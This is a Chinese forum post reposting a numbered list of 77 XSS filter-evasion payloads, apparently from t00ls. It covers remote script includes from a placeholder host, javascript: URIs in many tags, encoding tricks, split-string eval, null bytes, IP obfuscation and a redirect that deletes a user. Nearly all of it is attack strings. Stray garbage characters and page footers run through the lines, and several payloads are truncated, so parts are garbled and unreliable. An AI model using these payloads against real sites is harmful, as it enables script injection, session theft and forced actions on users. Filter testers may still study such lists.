貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。3 G# l a5 |. l7 i6 a
(1)普通的XSS JavaScript注入" k4 o% i2 B* ~1 Z( J6 I3 `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 f# b$ X. t$ ?
(2)IMG标签XSS使用JavaScript命令 n- X' T& g0 S+ h# O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: p3 s) N" i0 ?* m* K t(3)IMG标签无分号无引号0 D2 `4 e1 y& r# L* s, J+ j
<IMG SRC=javascript:alert(‘XSS’)>& b, R0 |1 U+ M" G- { m
(4)IMG标签大小写不敏感 Q+ h) z2 ~5 k9 U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 R% u$ W G1 W; z2 n
(5)HTML编码(必须有分号)* E( T) V, ]" o! m0 e
<IMG SRC=javascript:alert(“XSS”)>) Z& V' g8 j7 p4 V2 H, G: V
(6)修正缺陷IMG标签
- E6 A. _; s& C# b" l% ?<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' A8 P2 W+ f; g) F- _
8 ^* o) B z2 z! f F0 s% U; k* A
! Q: d6 s+ R( ^* N! J0 z, h(7)formCharCode标签(计算器)" _# ]# `+ y. k7 K# e" J. d
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) p+ Z7 s1 a# T/ `(8)UTF-8的Unicode编码(计算器)6 n; w0 m& @4 p/ b* z( t+ h
<IMG SRC=jav..省略..S')>
+ r. }# j, Y3 Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 h8 Q6 c) B5 \. F; V) u<IMG SRC=jav..省略..S')>/ h8 f2 }" I' X4 {1 _" x" ~3 X4 ]
(10)十六进制编码也是没有分号(计算器)8 T9 D x" z' }7 @! {5 t
<IMG SRC=java..省略..XSS')>
0 L9 k( Q' Y1 W& G- a. ~(11)嵌入式标签,将Javascript分开
7 L; `: u- Y- P0 x0 t<IMG SRC=”jav ascript:alert(‘XSS’);”>, j3 ]1 f0 c; H. G" H" p5 A
(12)嵌入式编码标签,将Javascript分开! `$ ]* W" {) T4 t$ u9 W- i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 ~- F5 U1 j! v0 U! p/ k5 O! K(13)嵌入式换行符( U P' H% _ T' @. D
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ N6 s/ f' Z' k& n1 p! [
(14)嵌入式回车
$ G! t3 }3 d+ l8 m<IMG SRC=”jav ascript:alert(‘XSS’);”>
( [2 v& z( r3 |4 }(15)嵌入式多行注入JavaScript,这是XSS极端的例子- Z# ^! N2 T9 y# T* d9 [( O
<IMG SRC=”javascript:alert(‘XSS‘)”>1 E* Z7 d, a8 l8 P9 `+ a. |+ A$ K
(16)解决限制字符(要求同页面)
4 r# Q1 Q S2 {% Y<script>z=’document.’</script>
0 `7 {1 c y0 K/ x<script>z=z+’write(“‘</script>/ n# e" a5 W7 A4 G
<script>z=z+’<script’</script>
$ r% n( ~8 \- C! D9 U<script>z=z+’ src=ht’</script>
1 z2 T5 O/ N; | Y' d3 e5 F- T<script>z=z+’tp://ww’</script>
, e) p* K+ H& ?1 i- z3 I* p<script>z=z+’w.shell’</script>
$ I" c( S8 T0 [- g1 ~( T<script>z=z+’.net/1.’</script>
2 Y1 Q( Z4 s+ y4 w8 {1 Q<script>z=z+’js></sc’</script>
$ h! w7 f. y9 s! J2 E7 r# |# G<script>z=z+’ript>”)’</script>; C; s, ?( O6 ^+ D0 o
<script>eval_r(z)</script>
# J8 D1 R# J7 T1 b: p4 {(17)空字符12-7-1 T00LS - Powered by Discuz! Board
- ^) t _. J# l4 m3 ^- ]https://www.t00ls.net/viewthread ... table&tid=15267 2/64 p( V' `8 g5 T2 |0 J. R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( `/ t; o @+ E(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 g; J1 N% \5 l) n5 u, C" Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" a8 G4 \2 U/ m8 ]$ u
(19)Spaces和meta前的IMG标签
, m( J! @7 D% s% M! ^2 E<IMG SRC=” javascript:alert(‘XSS’);”>0 j9 c' Q2 g1 w
(20)Non-alpha-non-digit XSS, @& p/ e4 P, P0 X }2 r- y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 E, H9 f' Y) d' w& {
(21)Non-alpha-non-digit XSS to 2( ^. q9 Y9 W% ~3 R v
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 p& S9 Y1 u. L/ M% p(22)Non-alpha-non-digit XSS to 3$ w7 A* Q" f- H, v8 w' ?
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 H1 v; J& G- |. V5 ^3 W3 Q& W(23)双开括号# P# M$ b6 t) T) `! m' Y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>% s/ S9 t/ h, R% C
(24)无结束脚本标记(仅火狐等浏览器)% e0 @2 N: F0 i. U. ]
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ r5 A0 i- X' V9 e. @
(25)无结束脚本标记2
, Q+ e8 g; n2 i- E' a# w& h# j. x<SCRIPT SRC=//3w.org/XSS/xss.js>
- e" Z$ L; f/ h& i(26)半开的HTML/JavaScript XSS
% ^6 ]' r0 a: W" r2 _) f<IMG SRC=”javascript:alert(‘XSS’)”* [6 U; T7 ~+ I
(27)双开角括号$ N- g5 k- u) G/ G! F$ T
<iframe src=http://3w.org/XSS.html <
! i6 M1 t# [8 y( |" y(28)无单引号 双引号 分号$ j! p4 i- K$ p6 k/ @
<SCRIPT>a=/XSS/5 X6 @. n/ r& O. E: [5 _5 \
alert(a.source)</SCRIPT>
) m" O+ @8 {# d% y(29)换码过滤的JavaScript
; n/ P8 i# r* d3 ~ t/ b6 \\”;alert(‘XSS’);/// k& e9 s5 p: f5 K1 ]& j
(30)结束Title标签
7 D+ t J8 g$ q0 v; j</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 t$ `3 d: L3 _# [6 H(31)Input Image, h4 B& y+ k) E. ~
<INPUT SRC=”javascript:alert(‘XSS’);”>
7 H$ q8 t' {6 X! z! a: _$ t(32)BODY Image
~) V6 e3 I G; \0 C+ ^<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ h& j0 s! O: Y- ^: O) n% y$ q(33)BODY标签: n8 q/ D |6 [$ p
<BODY(‘XSS’)>
; s- L2 Y1 A d(34)IMG Dynsrc
3 g5 ?5 k4 M& }<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: r6 `/ `0 ^! X6 C3 W1 I( j( m(35)IMG Lowsrc6 F. ]8 D4 ~" a
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. }& ?; ]1 G6 f' L# A, ^
(36)BGSOUND
: g2 o& Y6 D4 C S1 t" C1 D5 \<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 N9 ?% v) ?" H3 B0 y( D9 b(37)STYLE sheet9 l, r" W/ z4 v: c! j
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”># D0 z7 [# k- h; d, Q
(38)远程样式表: j3 w1 I- o8 w; V' e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 n# [& J& T# }6 \0 \(39)List-style-image(列表式)
- l: k& n' [/ N2 ~' E* K2 i<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 S5 Q$ P9 T* L(40)IMG VBscript
0 V) S6 r" m( S3 M" W( {0 I. |<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
. G3 M4 \! ^% Z, J- I(41)META链接url
' I% P$ b7 u2 e$ ]! R% ~9 P4 k( j( O1 `8 n. s. l
1 h2 ^& Q1 f. k$ z2 E% ^
<META HTTP-EQUIV=”refresh” CONTENT=”0;: U+ j! K0 ] L/ Z- [1 A
URL=http://;URL=javascript:alert(‘XSS’);”>- }7 }6 h/ m2 r$ b4 ^# [" J( P
(42)Iframe- K) d0 k5 v0 ?4 W& ^; V% V) x) n$ P
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; I$ f" c) N" ^. {: p+ Q(43)Frame
+ Q' _4 @0 I: _) m- a/ m<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
6 J4 K" _+ _0 J8 N {' p: A1 ehttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
+ f, s" I5 E, O2 { q(44)Table
+ c! B, o' j( ^1 A<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. |! g: p9 O7 B+ ]" R0 X: R$ k(45)TD0 \$ p! B) I! l( d8 T3 u9 `
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' Z* F' m( Z8 p8 p. j$ {: N(46)DIV background-image
+ ?0 a, f4 r$ h) Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# D2 f1 N7 C: P(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
3 ?2 t3 t. T! K" s7 _4 u8&13&12288&65279)) Z! f. V4 A3 Y2 A3 \8 P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 }4 }* |# F& s F6 n(48)DIV expression" c i7 M# l3 `( ?) y2 H& ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>- P- z" U9 D5 |- l
(49)STYLE属性分拆表达4 R8 @7 B5 t! E. o' W. p! C' Z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>, ?. l2 ^+ `2 V- Q- B
(50)匿名STYLE(组成:开角号和一个字母开头)2 G; e( V) s) h1 q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; `7 g6 V* C8 ]& x(51)STYLE background-image
) w( l, u2 }$ ?" S3 o<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A" x- |% G# p) h$ M- w( q. l
CLASS=XSS></A>
2 ?9 [- _4 A- f' Z f(52)IMG STYLE方式
: x! o- i. n4 n: J0 o8 Wexppression(alert(“XSS”))’>/ ]# `7 A- ?5 ]+ W
(53)STYLE background
. _; G5 j( K+ ~" H+ O3 x: O5 V<STYLE><STYLE5 L- j0 {: |$ j
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ Y" I( c7 \8 V8 I x7 T( q(54)BASE+ Y" Y5 e! D! C% ^$ ?
<BASE HREF=”javascript:alert(‘XSS’);//”>& ?- o* D6 Z- e- |2 \- x$ s" S
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ L# P, i" Q+ L" @" o/ c<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 t" X) ?- D" o
(56)在flash中使用ActionScrpt可以混进你XSS的代码
$ }4 Z3 X* [/ Ma=”get”;9 w3 F* f4 c/ L" k' K/ w
b=”URL(\”";
- u# } y9 L$ N, z" o" N( U% N$ Nc=”javascript:”; N) F* @) d: e) J5 m) p
d=”alert(‘XSS’);\”)”;# @' {8 L" ]& [( t
eval_r(a+b+c+d);
( ?" E* I4 u2 ^# u4 k(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 @: V- G& G0 a0 M% n) `
<HTML xmlns:xss>; @0 ~4 ?' ?. y! }9 E# A
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
, {9 ~1 @% A7 a) `4 r1 u<xss:xss>XSS</xss:xss>6 q8 ]" ^) y3 B8 h" N7 f# ^
</HTML>8 @; U6 g1 K, I4 d, ^2 q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用2 v3 a" L% Y$ P q. M; _
<SCRIPT SRC=””></SCRIPT>$ Z. d% i0 M' a# u4 }
(59)IMG嵌入式命令,可执行任意命令8 ^3 k1 o0 L G! ^) A
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ C9 A$ B- B( p* w. \, q* Y/ {* K1 J(60)IMG嵌入式命令(a.jpg在同服务器)
9 _: R- x4 c6 g+ i( FRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 g) |3 L9 Y3 d7 y, l: L
(61)绕符号过滤5 H( y- f Y( I3 n: J1 \$ N z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( ?. w! t* A' q( t* y(62)
; O9 N1 P+ I! _1 ?! d6 Z( F<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>+ n1 J" W! S5 W8 F, s
(63)
6 Y0 R( N3 `& D- ?8 O<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
! f6 C0 P( k: @8 ~$ O(64)
1 V) S. K8 e* U: X7 |1 N- T3 \<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
/ H$ _& A+ p% j" k+ H6 _' w(65)4 b4 g* B9 C$ a* S% n# m n
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 u6 M# W1 e3 B2 C; S, r(66)12-7-1 T00LS - Powered by Discuz! Board
7 [: N' m+ D% {: C* K4 Thttps://www.t00ls.net/viewthread ... table&tid=15267 4/6) f8 G P$ a: I" Y( C# y5 D
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 h4 h# L( s0 j2 o
(67)6 L8 l# S+ e$ S3 X/ o
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”># R/ z1 W8 B7 C, R2 B. ]
</SCRIPT>* c2 `6 \2 l. V& ]. J2 j" ?. `
(68)URL绕行 d% ~/ S/ D2 C1 `8 V
<A HREF=”http://127.0.0.1/”>XSS</A>
5 l) n/ Q2 U ~: T(69)URL编码5 b9 p) H% T* ^4 W; P' W! |7 D W
<A HREF=”http://3w.org”>XSS</A>0 J' V$ \/ y* S$ u; k
(70)IP十进制
' j; e7 F' }+ ~. ^# @2 _<A HREF=”http://3232235521″>XSS</A>
; e. o4 B" t# A+ C" O* c: Y/ |(71)IP十六进制
* G% V0 N/ f$ R& h<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! h- u& X( p4 G; t0 C: M9 `
(72)IP八进制
6 N0 X9 O# `7 ^; U, t" I" `0 ~<A HREF=”http://0300.0250.0000.0001″>XSS</A>
6 v& N ?' M" i+ A/ a: [& L(73)混合编码
: c p3 O- @" a5 `" c7 ^3 F( L V% ^. J<A HREF=”h5 [: R8 s3 g- i
tt p://6 6.000146.0×7.147/”">XSS</A>
8 Q$ W- P4 ~) q( N% w3 E( H(74)节省[http:]4 C! Z" r. h1 ?' n: n- [: f0 `, V- G
<A HREF=”//www.google.com/”>XSS</A>
: ^1 J9 o1 ~$ j5 e2 T( H(75)节省[www]
' u% ~& R, s! Z& v$ X$ }3 h<A HREF=”http://google.com/”>XSS</A>
/ y v0 `9 [1 D! D4 n f(76)绝对点绝对DNS, t0 c0 P9 Q Z3 d/ c! y
<A HREF=”http://www.google.com./”>XSS</A>
& l+ S7 Y1 @* U( E7 q, u(77)javascript链接 ^9 [/ e9 T# k0 J2 H5 n( [0 ^
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. {: \: q+ }0 K+ k. N- D" A5 e q C" L$ M5 V' }
原文地址:http://fuzzexp.org/u/0day/?p=14
' J& i9 t. o t, N, |+ X d4 B% P6 I
6 O5 r- L# Y! T, G( @6 Z |
发表于 2013-4-19 19:22:37
收藏
支持
反对